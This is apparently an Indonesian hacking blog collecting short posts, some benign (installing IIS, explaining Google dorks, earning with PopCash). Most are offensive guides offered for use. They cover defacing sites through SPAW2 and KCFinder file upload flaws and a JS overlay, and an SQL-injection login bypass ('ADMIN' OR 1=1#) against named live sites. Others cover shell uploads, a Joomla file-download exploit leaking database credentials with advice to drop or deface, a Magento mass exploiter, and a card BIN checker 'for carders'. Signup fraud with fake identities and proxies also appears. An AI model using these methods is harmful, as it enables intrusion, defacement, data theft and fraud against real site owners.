Mau Domain .host Gratis? Masuk Sini Ster

Dah ya gk usah basa basi ye..
lngsung ke tkp ja..

Alat Perang (WAJIB) :
- Anonymox, Zenmate, Vip72 . (Jangan menggunakan IP indonesia)
- Fakenamegenerator
- Email aktiv
- Kesabaran tentunya

LANGKAH - LANGKAH :

LANGKAH PERTAMA :
- Masuk ke sini. Masukkan "216.172.164.64" di kolom domain field

- Klik "Check Eligibility", lalu klik "Signup"

- Klik "Continue"

- Setelah itu lu akan di arahkan ke registration form, isi data sperti biasanya. Biar gada yang error atau cancel dalam order ini gunakan fakenamegenerator. Setelah berhasil, anda akan mendapatkan WHMCS Lisense yang dikirim ke email lu.

LANGKAH KEDUA :
- Masuk ke sini
- Masukkan domainmu terserah, klik "Select" lalu "Checkout"

- Masukkan WHMCS License Key > Validate License , cek di emailmu yang bwat daftar whmcs tadi. Lebih jelasnya lihat gambar dibwah

- Jika berhasil maka muncul notif seperti dibawah

- Skrol ke bawah daftar dulu disitu karena posisi gw saat itu blum punya akun whmcs host. Jika sudah tinggal login saja
- Jika sudah klik Confirm Order

- Cek email mu buat verifikasi.
- Seperti gambar berikut ini jika domain sudah aktiv :D

Semoga Bermanfaat

Method Deface SPAWN File Upload

Kali ini gw mo share exploit lama ya, btw ini jga bwat ngisi artikel aja, haha
Di exploit ini kita cuman diperbolehkan nitip file dengan format:
.txt dan .html
so kalian juga bisa mencoba dengan method tamper data / yang lain jika ingin mengupload file .php
gw juga blom nyoba sih ke bbrapa site..
sjauh ini yg gw temuin mesti kena notif "Error: files of this type are not allowed."

Skarang lngsung ke caranya ja ya, ikutin langkah-langkahnya:

Dork :
- inurl:/spaw2/uploads/files/ site:.com
- inurl:/spaw2/uploads/files/ site:.gov
- Bisa di kembangin sndiri ya :)

Exploit :
site,com/path/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

Langkah -Langkah :
- Masukin dork tadi di gugel, pilih site terserahlu..
- di url site target ganti jadi seperti ini:

Sebelumnya

www.wholehealthamerica.com/spaw2/uploads/files/

Sesudah

http://www.wholehealthamerica.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

- Ganti "Flash Movies" ke "Files", file type pilih All files (*.*).
- Sekarang Klik "Browse", pilih file mu. Jika sudah klik Upload

- Hasil file upload akan terUpload di site,com/path/spaw2/uploads/files/
- Jadi lngsung aja panggil file mu tadi dengan mengetikkan seperti ini:

http://www.wholehealthamerica.com/spaw2/uploads/files/ecf.txt

- Dah gitu aja gmpang kan :)

Semoga bermanfaat.

Method Deface JS Overlay

Gw lihat di mbah gugel tutorial disana udah bnyak sekali, metode kali ini yaitu JS Overlay, gw juga kurang tau knapa namanya JS Overlay, mungkin singkatan dari Javascript Overlay mungkin ya? haha..
Bagi lu yg udah mentok ngak bisa upload shell, upload poto, dan bingung gmna cara deface web yang tdk ada file uploadnya bahkan web itu tidak menyediakan tempat upload, naah tutorial ini ditunjukkan bwat yg dah mentok bingung gk bisa deface..

Sedikit berbeda dengan metode deface dengan upload shell, js overlay ini cara kerjanya memanggil script kita yang sudah jadi/lebih mudahnya sudah di upload di web dan dengan metode ini Konten web target akan ketimpa dengan script kita ini, tpi masih ttep ada kontennya, pasti masih bingung kan, so lngsung aja simak tutorialnya dibawah:

Script JS Overlay :


LANGKAH LANGKAH :

- Gw asumsikan lu dah punya web target yg dah mentok gk tau gimana cara defacenya
- Kita manfaatkan fasilitas cms web target, biasanya Add Article/Add Static Pages. Di tutorial ini gw manfaatin Add Static Pages
- Copas script JS Overlay di atas dan taruh di bagian Title, lebih jelasnya lihat gambar dibawah

- Save, dan lihat di web target tdi, kurang lebih jadi sperti ini

Dah gitu ja, simple kan hahaha..

Semoga bermanfaat

Mass Checker Adult Embed Script Bypass Krian

Default Dork :
- inurl:/ajax/videos_home.php?action= site:.com
- inurl:/static/3/dmca.html
- intext:"Your own text or Link here" Copyright © 2015
- intext:Copyright © 2015 Adult Embed Script All Rights Reserved.
- intext:Your own text or Link here porn inurl:channel
- Kembangin lagi yah :)

Live Target :
http://www.yehabesha.com
http://www.hibertube.com
http://www.etviral.com

Infected File :
http://localhost/admin/index.php

Exploit [Auth Bypass] :
USER: ADMIN' OR 1=1#
PASS: ADMIN' OR 1=1#

Cara Upload Shell [upload logo] :
http://localhost/admin/settings.php

Letak shell setelah di upload :
http://localhost/thumbnails/shell.php

Script Auto Exploit dibawah :



Klo masih bingung silahkan berkomentar :)

UNTUK UPLOAD SHELL GUNAKAN TAMPER DATA! BELUM TAU CARA MAKE TAMPER DATA? MASUK KEMARI

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Wordpress Checker PHP

Mengecek version, theme, plugin yg dipakai dalam suatu web, lngsng dari offcial theme dan pluginnya..
Kali ja ada yg minat bwat ngecek web target :D
Script ada di bwah :

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Auto Exploit Joomla com_cckjseblod LFD PHP

Default Dork:
inurl:option=com_cckjseblod

Link vuln:
www.site.com/index.php?option=com_cckjseblod&task=download&file=configuration.php

PoC:
var $dbtype = 'mysql';
var $host = 'localhost:3306';
var $user = 'star-_nice_mz';
var $db = 'star-pk_StarDB';
var $dbprefix = 'jos_';
var $mailer = 'smtp';
var $mailfrom = 'noreply@xxx.com';
var $fromname = 'Web Master, Star Marketing Pvt. Ltd.';
var $sendmail = '/usr/sbin/sendmail';

Script Auto exploit :



Cara penggunaan :
website target masukin ke file .txt terus save script d atas .php (skrip ama list target hrus 1 folder/taruh desktop ja biar mudah)
Run cmd: php sekripmu.php list.txt

Cara eksekusi target :
Auto exploit d atas auto get info db ama ftp. nah biasanya bwat yg awam psti bingung gmna cara tanem shell/mepesnya.
Misal lu dapet db, tinggal masukin detail db ke tool Adminer trus login..
Misal dapet ftp account, lu tinggal konekin lwat FileZilla/Core FTP..
Misal dapet db ama ftp lngkap, y trsrh mw lu apain drop db? depes? trsrah lu

dah gtu ja. smoga brmanfaat :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Berkreasi dengan ascii art

Pernah liat ngga' sih tulisan yg di model sperti ss di atas..
ya tulisan ini namanya ascii art..
dah ya ga' mo bnyk cincong lngsung ja kemari:

1. ASCII ART

2. ASCII ART ONE LINE (SATU BARIS)

Sub Domain Checker PHP

Sedikit pengertian dari subdomain itu sndiri Subdomain adalah bagian dari domain. Subdomain biasanya digunakan sebagai pembagian area dari sebuah website. Misalnya, untuk area utama website, digunakan www.yuzac0der.id dan untuk area diskusi digunakan subdomain forum.yuzac0der.id. Dalam contoh tersebut, "www" dan "forum" adalah nama subdomain.

Nah buat yg pengen tau subdomain dari sbuah website bisa gunain tool subdomain checker ini, penampakan ada di bawah

Sekrip ada di bawah.



cara penggunaan, save dlu filenya .php
run sperti biasanya php scripmu.php 'domain yg di scan tanpa http://'

Smoga brmanfaat :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Exploit Kcfinder Upload Shell

ths exploit discovered by incef team

nih udah lama emang, tpi apasalahnya share bwat yg blum tau bwat blajar jga..
Dah lngsng ja..

Dork: inurl:/kcfinder/upload.php (kmbangin sndiri y, jgn jagain dork)

Kalo vuln muncul "Unknown error"

Exploit :


Shell format : shell.php.ndsxf

Shell akses : site/path/upload/files/shell.php.ndsxf

slamat berexploitasi :) 

Cara membuat cpanel X Gratis 2016

Kali ini gw akan share cara daftar cpanel x gratis, tentunya cara ini udah gw coba dan tak ada masalah selama sesuai dengan method order tentunya. berikut ini adalah web penyedia web hosting with cpanel terbaru 2016:

1. kloud
Spesifikasi:
100 MB Storage
5 GB Monthly Traffic
Domains & Sub-Domains
E-Mail Accounts
cPanel & Softaculous
phpMyAdmin & MySQL/MariaDB
+350 Auto-Installer Scripts
DDos Protection
RAID Backup
SSH Access
TERTARIK ? DAFTAR DISINI

2. Helio
Spesifikasi:
Bandwidth Unlimited
Unlimited Sub-domains
Unlimited Addon Domains
Unlimited Parked Domains
MySQL Databases Unlimited
dan masih banyak lagi :) , tertarik sama yang ini ? kesini

CARA ORDER :
web hosting di atas memang memberikan hosting gratis 100% tapi ingat jangan sembarangan order, smua itu ada methodnya :) termasuk order di 2 web di atas. berikut ini adalah method ordernya:
1. Ganti ip sebelum akses ke website tsb (yang penting jangan ip indo) gunakan aja anonymox, zenmate, vip72, tersrhlu
2. saat order gunakan identitas sesuai dengan ip yang digunakan, bisa gunakan fakenamegenerator
3. email aktiv pastinya, nanti aktivasi dan info dari cpanel dikirim kesini.
4. biasanya klo udh sesuai method d atas, hosting pasti lngsng aktiv kurang dari 15min

Smoga tutor d atas brmanfaat :)

Cara membuka google search yang tidak bisa di akses

Masalah ini muncul saat gw lagi dorking di google. Siapa yang tidak kenal dengan mesin pencari terbesar didunia ini, kita seakan-akan tidak bisa lepas untuk menggunakannya mencari sesuatu didunia maya, namun disaat-saat sedang asyik ingin berselancar di google search, tiba-tiba ada pemberitahuan seperti ini :

Google
Sorry...
We're sorry...
... but your computer or network may be sending automated queries. To protect our users, we can't process your request right now.
See Google Help for more information.

Kenapa bisa terjadi seperti itu?, lalu bagaimana cara mengatasinya untuk browser Chrome, mozilla dan opera?

Bahasa kerennya disebut Google Blocking Search Result
Penyebab utama yakni ada malware pada desktop Anda, juga karena History pada browser sudah over sehingga si mbah google menyarankan kita membersihkan malware juga history browser yang ada pada kompi kita.

bagaimana cara mengatasinya? agar mozila Chrome atau Opera bisa kembali seperti sedia kala bisa menggunakan google ?

Ada dua cara yang bisa kita lakukan dan dijamin work 100 %

Cara pertama
untuk browser chrome

• Buka chrome
• Pada pojok kanan atas silahkan klik tanda Customize and controle chrome
• Klik History
• Klik Clear browsing data
• Sekarang silahkan buka Goggle dan coba mencari sesuatu

Untuk browser Mozilla

• Buka Browser Mozilla
• Pada menu silahkan klik riwayat/history
• Klik Bersihkan riwayat terakhir
• Pilih Semuanya
• Klik Bersihkan sekarang
• Sekarang silahkan buka Goggle dan coba mencari sesuatu

Untuk browser Opera

• Buka Browser Opera
• Klik Logo Opera
• Klik history
• Klik Clear browsing data
• Sekarang silahkan buka Goggle dan coba mencari sesuatu

Cara Kedua
Ini akan lebih mudah, karena hanya sekali langkah maka semua masalah pada semua browser langsung diatasi
Jika elu sudah memiliki Software CCleaner silahkan langsung buka CCleanernya

Jalankan CCleaner

Jika belum punya silahkan lu download Ccleaner

Smoga brmanfaat :)

Magento Scanner + Mass Exploiter PHP

[UPDATED 10:18 PM 5/13/2016]
kali ini gw mw share exploit magento versi PHP
udah di test work 100%

Gw bagi tools ni bwat lu smua free, boleh di recode/dikembangin, tpi jgn lupa jangan di hapus nama pmbuatnya!

cara gunain nya sperti biasa: php scriptmu.php listtarget.txt
script ada di bawah :



Dork magento, auto exploit magento versi web, smtp, upload shell, dll. masuk kesini

visit terus iya blog ini, klo prlu di bookmark biar ga lupa hehe, jgn lupa tinggalin komeng :)
di sini gak da yg namanya priv" an :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

FREE BIN CHECKER

BIN (Bank Identification Number) merupakan 6 digit awal nomor kartu kredit. Boleh dibilang untuk menunjukkan institusi yang mengeluarkan kartu tersebut pada konsumen atau card holder.

untuk penjelasan lngkapnya bisa di googling sndiri ya :) , udh bnyak bgt kok referensinya
buat yg gk mau ribet, bisa masuk ke blog ini udah lngkap dan jelas disitu

Gak bnyak cincong ya udah jelas dari ss diatas,
bwat para carder bisa make tools ini free,
langsung aja masuk disini

Cara menjalankan file .php di cmd

[UPDATED 8:48 AM 5/20/2016]

Langsung aja ya, pertama install dulu webservernya, kali ini menggunakan iis, krna biar tdak ribet" kyak xampp/lamp/dll, kita harus masuk ke php module di dir xampp. Klo mke xampp jga hrus d aktifkan dlu kan lwat control panelnya bwat buka webserver, dll. Ribeet!
IIS ini lngsng jalan wktu windows di nyalakan..
Jika blum terinstall IIS ikutin step-stepnya DISINI

LANGKAH LANGKAH

*Harus terinstall IIS, jika belum baca lagi dari atas
1. Download dulu Web Platform Installer disini
2. Buka iis manager, scroll kebawah ke bagian Management, nah disitu ada Web Platform Installer, klik kanan > Open feature. Lebih jelasnya lihat gambar dibawah

3. Tulis di search "php" pilih php versi 5.3.28 (serah lu mo pilih versi brapa) klik Add, lalu Install. Lihat gambar lebih jelasnya (gmbar di bawah sudah ter install jdi udah Installed :v pas belum di install lupa ga' d ss)

4. Setelah di klik install mncul popup, pilih "I accept"

5. ikutin intruksi yg kluar d layar smpe selesai, gampang kok ini
6. Langkah terakhir, kita tambahkan path environment variable
7. Buka Control Panel > pilih System and Security > pilih tab Advanced > klik tombol "Environment Variables". Pada kolom System Variables cari variable Path, pilih lalu tekan tombol edit. Tambahkan 'C:\Program Files (x86)\PHP\v5.6' di akhir value-nya, terserah sih mao di taruh mana yg penting masuk. Lebih jelasnya lihat ss dibawah

8. Klik OK, lalu restart pc,lepi lu.
9. Selesai.. Semoga Bermanfaat :)

Apa itu google dork?

Oke lngsung aja ya, bwat yg masih bingung dengan istilah dork, disini akn gw jelasin smpe akar apa itu dork, so pahamin yaa :

1. Google Dork
Dimulai dari kata dork. apasih dork itu? arti dork disini adalah sebuah keyword yang berfungsi untuk mencari beberapa informasi di mesin pencarian. Untuk lebih spesifik gw akan menjelaskan beberapa  fungsi dasar dork tsb:

Intitle / allintitle
Fungsi ini memungkinkan pengguna untuk mencari informasi yang disaring dari judul web, misalnya: untuk mencari blog Yuzanotes maka anda tinggal menuliskan dimesin pencarian sebagai beriku "intitle:Yuzanotes". Maka akan bertebaran beberawa web yang menampilkan judul tersebut.

Inurl / allinurl
Fungsi ini untuk mencari string pada url. Misalnya kita akan mencari tempat upload suatu website maka tinggal kita ketikan di google sebagai berikut. “inurl:/upload/uploads.php” maka akan bermunculan website yang memiliki url “upload/uploads.php”.

Filetype
Fungsi ini digunakan jika kita ingin mencari / ingin mendownload sebuah file. Contohnya kita mencari file Power Point dari makalah Pengembangan Teknologi. Maka anda hanya tinggal mengetikan “Makalah Pengembangan Teknologi filetype:pptx”

Site
Fungsi ini berguna untuk menyaring domain, semisal kita hanya ingin mencari website yang berdomain Indonesia maka tinggal mengetikan “keyword + site:.co.id / site:.web.id”.

Intext
Fungsi ini untuk mencari website yang memiliki kandungan kata/kalimat yang akan kita cari. Semisal untuk mencari cara install windows 7 maka tinggal ketikan di google “intext:cara install windows 7” Beberapa fungsi diatas bisa untuk digunakan bersamaan supaya hasil pencarian lebih spesifik, contohnya dalam mencari “Sebuah password dan user name” maka ketikan di google sebagai berikut: “Inurl:password.log intitle:index of password.txt“
“Intitle:index of + intext:username”

---

Path dan Localhost

Path adalah folder dimana web tersebut di install sedangkan “localhost” adalah ungkapan untuk suatu website, semisal “localhost/path/wp-content/” maka bisa diartikan “namaweb/instalasi/folder/” contoh : http://yuzac0der.id/wordpress/wp-content.
Bagaimana ? sudah agak faham kan? Nah mungkin itu dulu yang bias kami sampaikan. Jika ada yang kurang jelas silahkan layangkan komentar kalian di artikel ini. Semoga artikel yang kami berikan bermanfaat. Sekian !

Trik melihat source code yg di disable (HTML ONLY)

Siapa sih yg gk mau instan lngsung nyolong script punya orang? wkwk rasanya bnyak ya yg kek gini >,< , sebenernya ini simpel banget dan ini sama fungsinya dengan ctrl+u, berhubung kadang ada yg di disable fungsinya, jdi di buatlah artikel ini. Tapi trik ini blum banyak di ketahui orang awam looh. oke lngsung aja, gini stepnya:

1. Buka web target / bisa jga make script depesanmu, buka di browser
2. Di addressbar tambahin view-source: di awal url
3. Jadi gini view-source:http://yuzanotes.blogspot.com
4. Simple kan :D 

NOTE: Jangan sekali" mengganti copyright tanpa ijin sama si pembuatnya!

Script Anti Ctrl+u,c,v,y,z dan Klik Kanan (REDIRECT)

Yaa lu tau sndiri kan jaman skarang bnyak yg suka ganti copyright, nyolong script. Hal ini udh gk asing lgi bgi yg sering main di underground, di artikel ini gw mau share cara supaya lu bisa mengakali si pencolong skrip tdi dgn javascript redirect, oke lngsung aja ya

1. Masukin script d bawah tepat di bawah tag < body >
2. Lihat code ini {top.location.href="#"}, lalu ganti tanda pagar terserah elu, mau redirect ke profil fb mantan, terserah :3
3. Lalu Save, udah

Cara mudah mendapatkan dolar dari PopCash.Net

Popcash merupakan sebuah situs penyedia iklan yang sekarang mulai banyak penggemarnya, disamping popcash tidak scam (nipu) dan terbukti pembayarannya (gunakan pp verif bwat cash out). Popcash menggunakan sistem CPM (Cost Per Million), jadi besar kecilnya balance kita tergantung pada traffic situs kita sendiri dan jenis iklan yang dipakai popcash adalah pop up / pop under.

Cara daftar dan Trik supaya website/blog lu bisa cepet di Approve ama popcash (2 JAM LNGSNG APPROVED), ikutin step-step d bwah:

1. Pastikan site/blogmu udah ada sekitar 7+ Artikel (WAJIB)
2. Manfaatkan juga menu About, Contact, Disclaimer, Privacy Policy, Sitemap. Bisa di buat di static page, sperti yg ada di blog ini (WAJIB)
3. Masuk dan daftar popcash disini
4. Isi uname, email, pass, country sperti biasanya
5. Cek email lu bwat konfirmasi





6. Stelah masuk di dashboard popcash, klik "Add a new website", lihat gambar d bwah (ini webnya udah di approve waktu pending gk smpet di ss)





7. Isi sperti biasanya





8. Nah stelah Add website, nnti akan  ada tulisan Pending, smpe disini lu tinggal nunggu aja di approve apa kgak :v pantengin terus inbox emailmu
9. Dalam waktu 2 jam lngsung Approved :D





10. Lalu lngkah terakhir kita pasang code dari popcash ke site/blog kita, Login dulu lwat link dari email tdi. Masuk ke menu Publisher>Websites, lihat gmbar d bwah Klik Get Code





11. Lihat pada kotak panjangnya klik lalu pilih sitemu tadi, trus klik Get code





12. Copas codenya masukkan ke template web atau kalau make blogger, masukin ke Layout>Add a Gadget>pilih HTML/Javascript>paste di bagian content>Save

HASIL DALAM 7HARI, 50-100 VISITOR/DAY

Cara encrypt file .html ke javascript (menghindari lammer)

1. Siapin dulu skrip html yang mau di enkrip
2. Masuk ke site ini
3. Skrol ke bwah sampai nemu box ini.





4. Copas skripmu ke box sbelah kiri, lalu klik " --> " , nanti akan muncul code output enkripannya.





5. Copas output box kanan, dan selipin di skrip d bawah ini





6. Simpan dgn ekstensi .html, lalu coba jalankan di browser, ctrl+u . Dann selamat sc asli udh tdk bisa dilihat, (tdak bsa di baca bagi orng yg baru kenal bginian >,< )

Menjalankan Web Server IIS Windows 10

IIS (internet Information Service) merupakan web server yang dibuat oleh microsoft, dapat digunakan pada keluarga Windows NT. IIS mendukung protokol HTTP, HTTPS, FTP, FTPS, SMTP and NNTP. IIS dapat digunakan oleh aplikasi web dengan platform ASP.Net.

Cara install sangat mudah, ikutin aja step-step dibawah:

1. Masuk Control Panel > All Control Panel Items > Programs and Features. Klik Turn windows features on or off

2. Pilih (check) Internet Information Service pada windows and features

3. Tunggu sampai proses selesai. Selanjutnya cek dengan membuka browser, lalu mengetikkan url: localhost. Instalasi IIS berhasil dilakukan.

Semoga Bermanfaat :)